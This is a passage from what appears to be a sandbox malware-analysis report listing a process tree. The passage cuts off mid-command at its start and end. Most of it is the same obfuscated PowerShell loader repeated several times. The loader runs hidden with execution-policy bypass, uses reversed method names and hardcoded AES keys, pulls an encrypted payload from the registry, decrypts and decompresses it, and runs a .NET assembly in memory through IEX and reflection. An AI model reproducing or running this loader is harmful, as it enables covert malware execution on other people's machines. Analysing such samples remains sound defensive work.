System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        Hide Artifacts: Hidden Window
        
        PID:9328
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        Hide Artifacts: Hidden Window
        
        PID:2896
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "10108" "3224" "3128" "3228" "0" "0" "3232" "0" "0" "0" "0" "0"
        32⤵
        
        PID:1096
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:7552
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1260" "3204" "3132" "3208" "0" "0" "3212" "0" "0" "0" "0" "0"
        31⤵
        
        PID:8096
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:5732
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join 